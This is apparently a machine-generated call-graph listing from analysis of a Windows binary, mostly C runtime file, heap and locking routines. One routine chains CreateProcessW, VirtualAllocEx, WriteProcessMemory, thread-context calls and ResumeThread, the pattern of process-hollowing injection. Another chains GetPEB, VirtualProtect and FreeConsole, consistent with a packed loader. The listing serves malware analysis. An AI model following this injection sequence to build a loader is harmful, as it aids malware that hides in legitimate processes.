20782 11d76a 20770->20782 20772 111b24 __dosmaperr 14 API calls 20771->20772 20772->20774 20776 112fe2 20779 111b24 __dosmaperr 14 API calls 20776->20779 20777 112fef 20790 11e68f 20777->20790 20779->20774 20783 11d776 ___scrt_is_nonwritable_in_current_image 20782->20783 20800 112551 EnterCriticalSection 20783->20800 20785 11d784 20801 11d80e 20785->20801 20791 11e7ae 20790->20791 20827 11e831 20791->20827 20794 113004 20796 11302d 20794->20796 20797 113031 20796->20797 21104 10f509 LeaveCriticalSection 20797->21104 20799 113042 20799->20774 20800->20785 20802 11d831 20801->20802 20803 11d889 20802->20803 20810 11d791 20802->20810 20818 10f4f5 EnterCriticalSection 20802->20818 20819 10f509 LeaveCriticalSection 20802->20819 20804 118244 __dosmaperr 14 API calls 20803->20804 20805 11d892 20804->20805 20807 116eff ___free_lconv_mon 14 API calls 20805->20807 20808 11d89b 20807->20808 20808->20810 20820 117cc0 20808->20820 20815 11d7ca 20810->20815 20814 11d8cd 20814->20810 20826 112568 LeaveCriticalSection 20815->20826 20817 112fdb 20817->20776 20817->20777 20818->20802 20819->20802 20821 117f5d std::_Lockit::_Lockit 5 API calls 20820->20821 20822 117cdc 20821->20822 20823 117cfa InitializeCriticalSectionAndSpinCount 20822->20823 20824 117ce5 20822->20824 20823->20824 20825 10f4f5 EnterCriticalSection 20824->20825 20825->20814 20826->20817 20828 11e850 20827->20828 20829 11e863 20828->20829 20837 11e878 20828->20837 20830 111b24 __dosmaperr 14 API calls 20829->20830 20831 11e868 20830->20831 20832 112249 ___std_exception_copy 29 API calls 20831->20832 20833 11e7c4 20832->20833 20833->20794 20844 1229ab 20833->20844 20834 111b24 __dosmaperr 14 API calls 20835 11ea49 20834->20835 20836 112249 ___std_exception_copy 29 API calls 20835->20836 20836->20833 20842 11e998 20837->20842 20847 122873 20837->20847 20839 11e9e8 20840 122873 39 API calls 20839->20840 20839->20842 20841 11ea06 20840->20841 20841->20842 20843 122873 39 API calls 20841->20843 20842->20833 20842->20834 20843->20842 20861 122d63 20844->20861 20848 1228ca 20847->20848 20851 122882 20847->20851 20849 1228e0 __strnicoll 39 API calls 20848->20849 20852 122898 20849->20852 20850 122888 20853 111b24 __dosmaperr 14 API calls 20850->20853 20851->20850 20854 1228a5 20851->20854 20852->20839 20855 12288d 20853->20855 20856 111b24 __dosmaperr 14 API calls 20854->20856 20860 1228c3 20854->20860 20857 112249 ___std_exception_copy 29 API calls 20855->20857 20858 1228b4 20856->20858 20857->20852 20859 112249 ___std_exception_copy 29 API calls 20858->20859 20859->20852 20860->20839 20864 122d6f ___scrt_is_nonwritable_in_current_image 20861->20864 20862 122d76 20863 111b24 __dosmaperr 14 API calls 20862->20863 20865 122d7b 20863->20865 20864->20862 20866 122da1 20864->20866 20867 112249 ___std_exception_copy 29 API calls 20865->20867 20872 1229cb 20866->20872 20869 1229c6 20867->20869 20869->20794 20873 118205 __wsopen_s 39 API calls 20872->20873 20874 1229ed 20873->20874 20875 10ec73 __wsopen_s 17 API calls 20874->20875 20876 1229fa 20875->20876 20877 122a01 20876->20877 20885 122a39 20876->20885 20879 122a33 20877->20879 20880 116eff ___free_lconv_mon 14 API calls 20877->20880 20881 122df8 20879->20881 20880->20879 20882 122dfe 20881->20882 20883 122e3c 20881->20883 21103 11d52a LeaveCriticalSection 20882->21103 20883->20869 20932 122ed3 20885->20932 20888 122a84 20950 11d183 20888->20950 20889 122a6b 20890 111b37 __dosmaperr 14 API calls 20889->20890 20905 122a70 20890->20905 20893 122a92 20895 111b37 __dosmaperr 14 API calls 20893->20895 20894 122aa9 20963 122e3e CreateFileW 20894->20963 20898 122a97 20895->20898 20897 111b24 __dosmaperr 14 API calls 20902 122a7d 20897->20902 20900 122ae2 20902->20877 20905->20897 20933 122ef4 20932->20933 20934 122f0e 20932->20934 20933->20934 20936 111b24 __dosmaperr 14 API calls 20933->20936 21030 122e63 20934->21030 20937 122f03 20936->20937 20938 112249 ___std_exception_copy 29 API calls 20937->20938 20938->20934 20939 122f46 20940 122f75 20939->20940 20942 111b24 __dosmaperr 14 API calls 20939->20942 20943 122a56 20940->20943 21037 11272e 20940->21037 20945 122f6a 20942->20945 20943->20888 20943->20889 20944 122fc3 20944->20943 20946 123040 20944->20946 20947 112249 ___std_exception_copy 29 API calls 20945->20947 20948 112276 __Getctype 11 API calls 20946->20948 20947->20940 20949 12304c 20948->20949 20951 11d18f ___scrt_is_nonwritable_in_current_image 20950->20951 21044 112551 EnterCriticalSection 20951->21044 20953 11d196 20955 11d1bb 20953->20955 20959 11d22a EnterCriticalSection 20953->20959 20961 11d1dd 20953->20961 21048 11d3b9 20955->21048 20960 11d237 LeaveCriticalSection 20959->20960 20959->20961 20960->20953 21045 11d28d 20961->21045 20963->20900 21031 122e7b 21030->21031 21032 122e96 21031->21032 21033 111b24 __dosmaperr 14 API calls 21031->21033 21032->20939 21034 122eba 21033->21034 21035 112249 ___std_exception_copy 29 API calls 21034->21035 21036 122ec5 21035->21036 21036->20939 21038 11273a 21037->21038 21039 11274f 21037->21039 21040 111b24 __dosmaperr 14 API calls 21038->21040 21039->20944 21041 11273f 21040->21041 21042 112249 ___std_exception_copy 29 API calls 21041->21042 21043 11274a 21042->21043 21043->20944 21044->20953 21056 112568 LeaveCriticalSection 21045->21056 21047 11d1fd 21047->20893 21047->20894 21049 118244 __dosmaperr 14 API calls 21048->21049 21052 11d3cb 21049->21052 21050 11d3d8 21051 116eff ___free_lconv_mon 14 API calls 21050->21051 21053 11d1c0 21051->21053 21052->21050 21054 117cc0 __wsopen_s 6 API calls 21052->21054 21053->20961 21054->21052 21056->21047 21103->20883 21104->20799 22468 10a860 22469 10a874 22468->22469 22470 10aae9 69 API calls 22469->22470 22475 10a8cf 22469->22475 22471 10a89f 22470->22471 22472 10a8bc 22471->22472 22471->22475 22476 111c0e 22471->22476 22472->22475 22480 112f1b 22472->22480 22477 111c21 _Fputc 22476->22477 22478 111e87 67 API calls 22477->22478 22479 111c36 _Fputc 22478->22479 22479->22472 22481 112f26 22480->22481 22482 112f3b 22480->22482 22483 111b24 __dosmaperr 14 API calls 22481->22483 22484 112f43 22482->22484 22485 112f58 22482->22485 22486 112f2b 22483->22486 22487 111b24 __dosmaperr 14 API calls 22484->22487 22494 113573 22485->22494 22489 112249 ___std_exception_copy 29 API calls 22486->22489 22490 112f48 22487->22490 22492 112f36 22489->22492 22493 112249 ___std_exception_copy 29 API calls 22490->22493 22491 112f53 22491->22475 22492->22475 22493->22491 22495 113587 _Fputc 22494->22495 22498 113bce 22495->22498 22497 113593 _Fputc 22497->22491 22499 113bda ___scrt_is_nonwritable_in_current_image 22498->22499 22500 113be1 22499->22500 22501 113c04 22499->22501 22502 1123f2 _Fputc 29 API calls 22500->22502 22509 10f4f5 EnterCriticalSection 22501->22509 22505 113bfa 22502->22505 22504 113c12 22506 11397b 34 API calls 22504->22506 22505->22497 22507 113c21 22506->22507 22510 113c53 22507->22510 22509->22504 22513 10f509 LeaveCriticalSection 22510->22513 22512 113c5b 22512->22505 22513->22512 22529 118891 22530 1188ac ___scrt_is_nonwritable_in_current_image 22529->22530 22541 112551 EnterCriticalSection 22530->22541 22532 1188b3 22542 11d469 22532->22542 22539 1189e2 2 API calls 22540 1188d1 22539->22540 22561 1188f7 22540->22561 22541->22532 22543 11d475 ___scrt_is_nonwritable_in_current_image 22542->22543 22544 11d49f 22543->22544 22545 11d47e 22543->22545 22564 112551 EnterCriticalSection 22544->22564 22547 111b24 __dosmaperr 14 API calls 22545->22547 22548 11d483 22547->22548 22549 112249 ___std_exception_copy 29 API calls 22548->22549 22552 1188c2 22549->22552 22551 11d3b9 __wsopen_s 15 API calls 22554 11d4ab 22551->22554 22552->22540 22555 11892c GetStartupInfoW 22552->22555 22553 11d4d7 22565 11d4fe 22553->22565 22554->22551 22554->22553 22556 1188cc 22555->22556 22557 118949 22555->22557 22556->22539 22557->22556 22558 11d469 30 API calls 22557->22558 22559 118971 22558->22559 22559->22556 22560 1189a1 GetFileType 22559->22560 22560->22559 22569 112568 LeaveCriticalSection 22561->22569 22563 1188e2 22564->22554 22568 112568 LeaveCriticalSection 22565->22568 22567 11d505 22567->22552 22568->22567 22569->22563 19080 10a680 19082 10a692 _Yarn 19080->19082 19081 10a698 19082->19081 19083 10a742 19082->19083 19086 1132f7 19082->19086 19083->19081 19085 1132f7 __fread_nolock 45 API calls 19083->19085 19085->19081 19089 11325a 19086->19089 19091 113266 ___scrt_is_nonwritable_in_current_image 19089->19091 19090 11329e 19090->19082 19091->19090 19092 1132b0 19091->19092 19093 113279 __fread_nolock 19091->19093 19102 10f4f5 EnterCriticalSection 19092->19102 19117 111b24 19093->19117 19096 1132ba 19103 113314 19096->19103 19102->19096 19107 113326 __fread_nolock 19103->19107 19109 1132d1 19103->19109 19104 113333 19105 111b24 __dosmaperr 14 API calls 19104->19105 19106 113338 19105->19106 19108 112249 ___std_exception_copy 29 API calls 19106->19108 19107->19104 19107->19109 19112 113384 19107->19112 19108->19109 19123 1132ef 19109->19123 19111 1134af __fread_nolock 19115 111b24 __dosmaperr 14 API calls 19111->19115 19112->19109 19112->19111 19126 119960 19112->19126 19133 11edcc 19112->19133 19198 11e4f5 19112->19198 19219 1131d9 19112->19219 19115->19106 19118 1172eb __dosmaperr 14 API calls 19117->19118 19119 111b29 19118->19119 19120 112249 19119->19120 19484 112498 19120->19484 19122 112255 19122->19090 19544 10f509 LeaveCriticalSection 19123->19544 19125 1132f5 19125->19090 19127 119981 19126->19127 19128 11996c 19126->19128 19127->19112 19129 111b24 __dosmaperr 14 API calls 19128->19129 19130 119971 19129->19130 19131 112249 ___std_exception_copy 29 API calls 19130->19131 19132 11997c 19131->19132 19132->19112 19134 11edf6 19133->19134 19135 11edde 19133->19135 19137 11f138 19134->19137 19142 11ee39 19134->19142 19242 111b37 19135->19242 19139 111b37 __dosmaperr 14 API calls 19137->19139 19141 11f13d 19139->19141 19140 111b24 __dosmaperr 14 API calls 19143 11edeb 19140->19143 19144 111b24 __dosmaperr 14 API calls 19141->19144 19142->19143 19145 11ee44 19142->19145 19150 11ee74 19142->19150 19143->19112 19146 11ee51 19144->19146 19147 111b37 __dosmaperr 14 API calls 19145->19147 19151 112249 ___std_exception_copy 29 API calls 19146->19151 19148 11ee49 19147->19148 19149 111b24 __dosmaperr 14 API calls 19148->19149 19149->19146 19152 11ee8d 19150->19152 19153 11ee9a 19150->19153 19154 11eec8 19150->19154 19151->19143 19152->19153 19156 11eeb6 19152->19156 19155 111b37 __dosmaperr 14 API calls 19153->19155 19245 116f39 19154->19245 19158 11ee9f 19155->19158 19233 12196f 19156->19233 19160 111b24 __dosmaperr 14 API calls 19158->19160 19163 11eea6 19160->19163 19166 112249 ___std_exception_copy 29 API calls 19163->19166 19164 11f014 19167 11f088 19164->19167 19168 11f02d GetConsoleMode 19164->19168 19195 11eeb1 __fread_nolock 19166->19195 19170 11f08c ReadFile 19167->19170 19168->19167 19171 11f03e 19168->19171 19169 116eff ___free_lconv_mon 14 API calls 19172 11eee9 19169->19172 19173 11f100 GetLastError 19170->19173 19174 11f0a4 19170->19174 19171->19170 19175 11f044 ReadConsoleW 19171->19175 19176 11eef3 19172->19176 19177 11ef0e 19172->19177 19178 11f064 19173->19178 19179 11f10d 19173->19179 19174->19173 19180 11f07d 19174->19180 19175->19180 19182 11f05e GetLastError 19175->19182 19184 111b24 __dosmaperr 14 API calls 19176->19184 19258 11ca94 19177->19258 19178->19195 19262 111b4a 19178->19262 19185 111b24 __dosmaperr 14 API calls 19179->19185 19190 11f0e0 19180->19190 19191 11f0c9 19180->19191 19180->19195 19182->19178 19183 116eff ___free_lconv_mon 14 API calls 19183->19143 19188 11eef8 19184->19188 19186 11f112 19185->19186 19189 111b37 __dosmaperr 14 API calls 19186->19189 19192 111b37 __dosmaperr 14 API calls 19188->19192 19189->19195 19194 11f0f9 19190->19194 19190->19195 19267 11f1d5 19191->19267 19192->19195 19280 11f479 19194->19280 19195->19183 19199 11e500 19198->19199 19200 11e50d 19199->19200 19205 11e525 19199->19205 19201 111b24 __dosmaperr 14 API calls 19200->19201 19202 11e512 19201->19202 19203 112249 ___std_exception_copy 29 API calls 19202->19203 19213 11e51d 19203->19213 19204 11e584 19206 119960 _Fputc 29 API calls 19204->19206 19205->19204 19205->19213 19474 1209c0 19205->19474 19208 11e59d 19206->19208 19444 11ecb3 19208->19444 19211 119960 _Fputc 29 API calls 19212 11e5d6 19211->19212 19212->19213 19214 119960 _Fputc 29 API calls 19212->19214 19213->19112 19215 11e5e4 19214->19215 19215->19213 19216 119960 _Fputc 29 API calls 19215->19216 19217 11e5f2 19216->19217 19218 119960 _Fputc 29 API calls 19217->19218 19218->19213 19220 1131ea 19219->19220 19229 1131e6 _Yarn 19219->19229 19221 1131f1 19220->19221 19224 113204 __fread_nolock 19220->19224 19222 111b24 __dosmaperr 14 API calls 19221->19222 19223 1131f6 19222->19223 19225 112249 ___std_exception_copy 29 API calls 19223->19225 19226 113232 19224->19226 19227 11323b 19224->19227 19224->19229 19225->19229 19228 111b24 __dosmaperr 14 API calls 19226->19228 19227->19229 19231 111b24 __dosmaperr 14 API calls 19227->19231 19230 113237 19228->19230 19229->19112 19232 112249 ___std_exception_copy 29 API calls 19230->19232 19231->19230 19232->19229 19234 12197c 19233->19234 19236 121989 19233->19236 19235 111b24 __dosmaperr 14 API calls 19234->19235 19237 121981 19235->19237 19238 121995 19236->19238 19239 111b24 __dosmaperr 14 API calls 19236->19239 19237->19164 19238->19164 19240 1219b6 19239->19240 19241 112249 ___std_exception_copy 29 API calls 19240->19241 19241->19237 19286 1172eb GetLastError 19242->19286 19244 111b3c 19244->19140 19246 116f77 19245->19246 19247 116f47 __dosmaperr 19245->19247 19248 111b24 __dosmaperr 14 API calls 19246->19248 19247->19246 19249 116f62 RtlAllocateHeap 19247->19249 19251 10fcb8 std::_Facet_Register 2 API calls 19247->19251 19250 116f75 19248->19250 19249->19247 19249->19250 19252 116eff 19250->19252 19251->19247 19253 116f0a HeapFree 19252->19253 19257 116f34 19252->19257 19254 116f1f GetLastError 19253->19254 19253->19257 19255 116f2c __dosmaperr 19254->19255 19256 111b24 __dosmaperr 12 API calls 19255->19256 19256->19257 19257->19169 19259 11caa8 _Fputc 19258->19259 19414 11cc35 19259->19414 19261 11cabd _Fputc 19261->19156 19263 111b37 __dosmaperr 14 API calls 19262->19263 19264 111b55 __dosmaperr 19263->19264 19265 111b24 __dosmaperr 14 API calls 19264->19265 19266 111b68 19265->19266 19266->19195 19433 11f32c 19267->19433 19271 11f2e9 19274 11f2f2 GetLastError 19271->19274 19277 11f21d 19271->19277 19272 11f277 19278 11f231 19272->19278 19279 11ca94 __fread_nolock 31 API calls 19272->19279 19273 11f267 19275 111b24 __dosmaperr 14 API calls 19273->19275 19276 111b4a __dosmaperr 14 API calls 19274->19276 19275->19277 19276->19277 19277->19195 19439 116f87 19278->19439 19279->19278 19282 11f4b3 19280->19282 19281 11f0fe 19281->19195 19282->19281 19283 11f549 ReadFile 19282->19283 19283->19281 19284 11f566 19283->19284 19284->19281 19285 11ca94 __fread_nolock 31 API calls 19284->19285 19285->19281 19287 117301 19286->19287 19288 117307 19286->19288 19309 117bc4 19287->19309 19292 11730b SetLastError 19288->19292 19314 117c03 19288->19314 19292->19244 19295 117338 19296 117351 19295->19296 19297 117340 19295->19297 19299 117c03 __dosmaperr 6 API calls 19296->19299 19298 117c03 __dosmaperr 6 API calls 19297->19298 19300 11734e 19298->19300 19301 11735d 19299->19301 19306 116eff ___free_lconv_mon 12 API calls 19300->19306 19302 117361 19301->19302 19303 117378 19301->19303 19305 117c03 __dosmaperr 6 API calls 19302->19305 19326 1174ac 19303->19326 19305->19300 19306->19292 19308 116eff ___free_lconv_mon 12 API calls 19308->19292 19331 117f5d 19309->19331 19311 117be0 19312 117be9 19311->19312 19313 117bfb TlsGetValue 19311->19313 19312->19288 19315 117f5d std::_Lockit::_Lockit 5 API calls 19314->19315 19316 117c1f 19315->19316 19317 117323 19316->19317 19318 117c3d TlsSetValue 19316->19318 19317->19292 19319 118244 19317->19319 19324 118251 __dosmaperr 19319->19324 19320 118291 19323 111b24 __dosmaperr 13 API calls 19320->19323 19321 11827c HeapAlloc 19322 11828f 19321->19322 19321->19324 19322->19295 19323->19322 19324->19320 19324->19321 19345 10fcb8 19324->19345 19358 117612 19326->19358 19332 117f8d 19331->19332 19336 117f89 std::_Lockit::_Lockit 19331->19336 19332->19336 19337 117e92 19332->19337 19335 117fa7 GetProcAddress 19335->19336 19336->19311 19343 117ea3 ___vcrt_InitializeCriticalSectionEx 19337->19343 19338 117f39 19338->19335 19338->19336 19339 117ec1 LoadLibraryExW 19340 117f40 19339->19340 19341 117edc GetLastError 19339->19341 19340->19338 19342 117f52 FreeLibrary 19340->19342 19341->19343 19342->19338 19343->19338 19343->19339 19344 117f0f LoadLibraryExW 19343->19344 19344->19340 19344->19343 19348 10fcf3 19345->19348 19349 10fcff ___scrt_is_nonwritable_in_current_image 19348->19349 19354 112551 EnterCriticalSection 19349->19354 19351 10fd0a CallUnexpected 19355 10fd41 19351->19355 19354->19351 19356 112568 std::_Lockit::~_Lockit LeaveCriticalSection 19355->19356 19357 10fcc3 19356->19357 19357->19324 19359 11761e ___scrt_is_nonwritable_in_current_image 19358->19359 19372 112551 EnterCriticalSection 19359->19372 19361 117628 19373 117658 19361->19373 19364 117664 19365 117670 ___scrt_is_nonwritable_in_current_image 19364->19365 19377 112551 EnterCriticalSection 19365->19377 19367 11767a 19378 117461 19367->19378 19369 117692 19382 1176b2 19369->19382 19372->19361 19376 112568 LeaveCriticalSection 19373->19376 19375 11751a 19375->19364 19376->19375 19377->19367 19379 117497 __Getctype 19378->19379 19380 117470 __Getctype 19378->19380 19379->19369 19380->19379 19385 11a8ea 19380->19385 19413 112568 LeaveCriticalSection 19382->19413 19384 117383 19384->19308 19387 11a96a 19385->19387 19388 11a900 19385->19388 19386 11aa84 __Getctype 14 API calls 19412 11a9c6 19386->19412 19389 116eff ___free_lconv_mon 14 API calls 19387->19389 19411 11a9b8 19387->19411 19388->19387 19393 116eff ___free_lconv_mon 14 API calls 19388->19393 19407 11a933 19388->19407 19390 11a98c 19389->19390 19391 116eff ___free_lconv_mon 14 API calls 19390->19391 19394 11a99f 19391->19394 19392 116eff ___free_lconv_mon 14 API calls 19395 11a95f 19392->19395 19397 11a928 19393->19397 19399 116eff ___free_lconv_mon 14 API calls 19394->19399 19400 116eff ___free_lconv_mon 14 API calls 19395->19400 19396 11aa26 19401 116eff ___free_lconv_mon 14 API calls 19396->19401 19402 119d41 ___free_lconv_mon 14 API calls 19397->19402 19398 116eff ___free_lconv_mon 14 API calls 19404 11a94a 19398->19404 19405 11a9ad 19399->19405 19400->19387 19406 11aa2c 19401->19406 19402->19407 19403 116eff 14 API calls ___free_lconv_mon 19403->19412 19408 11a05d __Getctype 14 API calls 19404->19408 19409 116eff ___free_lconv_mon 14 API calls 19405->19409 19406->19379 19407->19398 19410 11a955 19407->19410 19408->19410 19409->19411 19410->19392 19411->19386 19412->19396 19412->19403 19413->19384 19420 11d119 19414->19420 19416 11cc47 19417 11cc63 SetFilePointerEx 19416->19417 19419 11cc4f __wsopen_s 19416->19419 19418 11cc7b GetLastError 19417->19418 19417->19419 19418->19419 19419->19261 19421 11d126 19420->19421 19422 11d13b 19420->19422 19423 111b37 __dosmaperr 14 API calls 19421->19423 19424 111b37 __dosmaperr 14 API calls 19422->19424 19426 11d160 19422->19426 19425 11d12b 19423->19425 19427 11d16b 19424->19427 19428 111b24 __dosmaperr 14 API calls 19425->19428 19426->19416 19429 111b24 __dosmaperr 14 API calls 19427->19429 19430 11d133 19428->19430 19431 11d173 19429->19431 19430->19416 19432 112249 ___std_exception_copy 29 API calls 19431->19432 19432->19430 19434 11f360 19433->19434 19435 11f3d1 ReadFile 19434->19435 19436 11f1ec 19434->19436 19435->19436 19437 11f3ea 19435->19437 19436->19272 19436->19273 19436->19277 19436->19278 19437->19436 19438 11ca94 __fread_nolock 31 API calls 19437->19438 19438->19436 19442 116fb1 19439->19442 19443 116fa3 MultiByteToWideChar 19442->19443 19443->19271 19445 11ecbf ___scrt_is_nonwritable_in_current_image 19444->19445 19446 11ecc7 19445->19446 19449 11ece2 19445->19449 19447 111b37 __dosmaperr 14 API calls 19446->19447 19448 11eccc 19447->19448 19451 111b24 __dosmaperr 14 API calls 19448->19451 19450 11ecf9 19449->19450 19453 11ed34 19449->19453 19452 111b37 __dosmaperr 14 API calls 19450->19452 19454 11e5a5 19451->19454 19455 11ecfe 19452->19455 19456 11ed52 19453->19456 19457 11ed3d 19453->19457 19454->19211 19454->19213 19459 111b24 __dosmaperr 14 API calls 19455->19459 19479 11d507 EnterCriticalSection 19456->19479 19460 111b37 __dosmaperr 14 API calls 19457->19460 19462 11ed06 19459->19462 19463 11ed42 19460->19463 19461 11ed58 19464 11ed77 19461->19464 19465 11ed8c 19461->19465 19468 112249 ___std_exception_copy 29 API calls 19462->19468 19466 111b24 __dosmaperr 14 API calls 19463->19466 19467 111b24 __dosmaperr 14 API calls 19464->19467 19469 11edcc __fread_nolock 41 API calls 19465->19469 19466->19462 19470 11ed7c 19467->19470 19468->19454 19471 11ed87 19469->19471 19472 111b37 __dosmaperr 14 API calls 19470->19472 19480 11edc4 19471->19480 19472->19471 19475 118244 __dosmaperr 14 API calls 19474->19475 19476 1209dd 19475->19476 19477 116eff ___free_lconv_mon 14 API calls 19476->19477 19478 1209e7 19477->19478 19478->19204 19479->19461 19483 11d52a LeaveCriticalSection 19480->19483 19482 11edca 19482->19454 19483->19482 19485 1124aa _Fputc 19484->19485 19488 1123f2 19485->19488 19487 1124c2 _Fputc 19487->19122 19489 112402 19488->19489 19490 112409 19488->19490 19497 10f8a0 GetLastError 19489->19497 19492 112417 19490->19492 19501 11246f 19490->19501 19492->19487 19494 11243e 19494->19492 19504 112276 IsProcessorFeaturePresent 19494->19504 19496 11246e 19498 10f8b9 19497->19498 19508 11739c 19498->19508 19502 112493 19501->19502 19503 11247a GetLastError SetLastError 19501->19503 19502->19494 19503->19494 19505 112282 19504->19505 19530 1122aa 19505->19530 19509 1173af 19508->19509 19513 1173b5 19508->19513 19510 117bc4 __dosmaperr 6 API calls 19509->19510 19510->19513 19511 117c03 __dosmaperr 6 API calls 19512 1173cf 19511->19512 19514 10f8d5 SetLastError 19512->19514 19515 118244 __dosmaperr 14 API calls 19512->19515 19513->19511 19513->19514 19514->19490 19516 1173df 19515->19516 19517 1173e7 19516->19517 19518 1173fc 19516->19518 19519 117c03 __dosmaperr 6 API calls 19517->19519 19520 117c03 __dosmaperr 6 API calls 19518->19520 19521 1173f3 19519->19521 19522 117408 19520->19522 19526 116eff ___free_lconv_mon 14 API calls 19521->19526 19523 11741b 19522->19523 19524 11740c 19522->19524 19525 1174ac __dosmaperr 14 API calls 19523->19525 19527 117c03 __dosmaperr 6 API calls 19524->19527 19528 117426 19525->19528 19526->19514 19527->19521 19529 116eff ___free_lconv_mon 14 API calls 19528->19529 19529->19514 19531 1122c6 __fread_nolock CallUnexpected 19530->19531 19532 1122f2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19531->19532 19535 1123c3 CallUnexpected 19532->19535 19534 112297 GetCurrentProcess TerminateProcess 19534->19496 19536 1091e8 19535->19536 19537 1091f0 19536->19537 19538 1091f1 IsProcessorFeaturePresent 19536->19538 19537->19534 19540 10b4da 19538->19540 19543 10b5bf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19540->19543 19542 10b5bd 19542->19534 19543->19542 19544->19125 21211 13218d 21216 1321c3 21211->21216 21212 132310 GetPEB 21213 132322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 21212->21213 21214 1323c9 WriteProcessMemory 21213->21214 21213->21216 21215 13240e 21214->21215 21217 132413 WriteProcessMemory 21215->21217 21218 132450 WriteProcessMemory Wow64SetThreadContext ResumeThread 21215->21218 21216->21212 21216->21213 21217->21215 20677 111bd4 20678 111be7 _Fputc 20677->20678 20681 111e87 20678->20681 20680 111bfc _Fputc 20685 111e93 ___scrt_is_nonwritable_in_current_image 20681->20685 20682 111e99 20683 1123f2 _Fputc 29 API calls 20682->20683 20684 111eb4 20683->20684 20684->20680 20685->20682 20686 111edc 20685->20686 20692 10f4f5 EnterCriticalSection 20686->20692 20688 111ee8 20693 111d9b 20688->20693 20690 111efe 20704 111f27 20690->20704 20692->20688 20694 111dc1 20693->20694 20695 111dae 20693->20695 20707 111cc2 20694->20707 20695->20690 20697 111de4 20698 111e72 20697->20698 20699 111dff 20697->20699 20714 1135a9 20697->20714 20698->20690 20701 112b24 ___scrt_uninitialize_crt 64 API calls 20699->20701 20702 111e12 20701->20702 20711 11cad4 20702->20711 20728 10f509 LeaveCriticalSection 20704->20728 20706 111f2f 20706->20684 20708 111cd3 20707->20708 20709 111d2b 20707->20709 20708->20709 20710 11ca94 __fread_nolock 31 API calls 20708->20710 20709->20697 20710->20709 20712 11cc35 __fread_nolock 31 API calls 20711->20712 20713 11caed 20712->20713 20713->20698 20715 11397b 20714->20715 20716 1139b2 20715->20716 20717 11398a 20715->20717 20719 119960 _Fputc 29 API calls 20716->20719 20718 1123f2 _Fputc 29 API calls 20717->20718 20727 1139a5 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20718->20727 20720 1139bb 20719->20720 20721 11caf2 33 API calls 20720->20721 20722 1139d9 20721->20722 20723 113a65 20722->20723 20725 113a7c 20722->20725 20722->20727 20724 113605 34 API calls 20723->20724 20724->20727 20726 1137b0 33 API calls 20725->20726 20725->20727 20726->20727 20727->20699 20728->20706 24190 10a9c0 24191 10a9cc 24190->24191 24195 10aa03 24191->24195 24196 11430c 24191->24196 24193 10a9f0 24194 10aa6c 29 API calls 24193->24194 24193->24195 24194->24195 24197 11431f _Fputc 24196->24197 24200 114379 24197->24200 24199 114334 _Fputc 24199->24193 24201 11438b 24200->24201 24204 1143ae 24200->24204 24202 1123f2 _Fputc 29 API calls 24201->24202 24203 1143a6 24202->24203 24203->24199 24204->24201 24205 1143d5 24204->24205 24208 1144af 24205->24208 24209 1144bb ___scrt_is_nonwritable_in_current_image 24208->24209 24216 10f4f5 EnterCriticalSection 24209->24216 24211 1144c9 24217 11440f 24211->24217 24213 1144d6 24226 1144fe 24213->24226 24216->24211 24218 112b24 ___scrt_uninitialize_crt 64 API calls 24217->24218 24219 11442a 24218->24219 24220 1197ed 14 API calls 24219->24220 24221 114434 24220->24221 24222 118244 __dosmaperr 14 API calls 24221->24222 24225 11444f 24221->24225 24223 114473 24222->24223 24224 116eff ___free_lconv_mon 14 API calls 24223->24224 24224->24225 24225->24213 24229 10f509 LeaveCriticalSection 24226->24229 24228 11440d 24228->24199 24229->24228 20658 68ad3 20665 64d83 20658->20665 20659 68ec7 GetPEB 20659->20665 20660 68e85 GetPEB 20660->20665 20661 694c7 FreeConsole 20673 51000 20661->20673 20663 51000 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20663->20665 20664 63b60 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20664->20665 20665->20659 20665->20660 20665->20661 20665->20663 20665->20664 20666 66c96 20665->20666 20667 67d59 VirtualProtect 20665->20667 20668 67974 GetPEB 20665->20668 20669 66650 20665->20669 20670 6758c GetPEB 20665->20670 20667->20665 20668->20665 20671 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20669->20671 20670->20665 20672 69b0c 20671->20672 20674 5104c 20673->20674 20675 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20674->20675 20676 54f0e 20675->20676 20676->20665 23019 10a4f0 23020 10a4fc __EH_prolog3_GS 23019->23020 23023 10a561 23020->23023 23024 10a548 23020->23024 23027 10a513 23020->23027 23038 112dc6 23023->23038 23035 109e4d 23024->23035 23070 10bb74 23027->23070 23030 10a614 23062 791e0 23030->23062 23031 10a57e 23031->23030 23033 10a62d 23031->23033 23034 112dc6 45 API calls 23031->23034 23058 109ca3 23031->23058 23032 114627 31 API calls 23032->23033 23033->23030 23033->23032 23034->23031 23036 112dc6 45 API calls 23035->23036 23037 109e58 23036->23037 23037->23027 23039 112dd2 ___scrt_is_nonwritable_in_current_image 23038->23039 23040 112df4 23039->23040 23041 112ddc 23039->23041 23073 10f4f5 EnterCriticalSection 23040->23073 23042 111b24 __dosmaperr 14 API calls 23041->23042 23044 112de1 23042->23044 23046 112249 ___std_exception_copy 29 API calls 23044->23046 23045 112dff 23047 119960 _Fputc 29 API calls 23045->23047 23048 112e17 23045->23048 23057 112dec _Fputc 23046->23057 23047->23048 23049 112ea7 23048->23049 23050 112e7f 23048->23050 23074 112edf 23049->23074 23052 111b24 __dosmaperr 14 API calls 23050->23052 23054 112e84 23052->23054 23053 112ead 23084 112ed7 23053->23084 23055 112249 ___std_exception_copy 29 API calls 23054->23055 23055->23057 23057->23031 23059 109cca 23058->23059 23061 109caf 23058->23061 23088 10b013 23059->23088 23061->23031 23066 79210 _Deallocate 23062->23066 23063 7b20d 23064 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 23063->23064 23065 7b235 23064->23065 23065->23027 23066->23063 23067 7b191 23066->23067 23068 112259 29 API calls 23067->23068 23069 7b242 23068->23069 23071 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 23070->23071 23072 10bb7e 23071->23072 23072->23072 23073->23045 23075 112f00 23074->23075 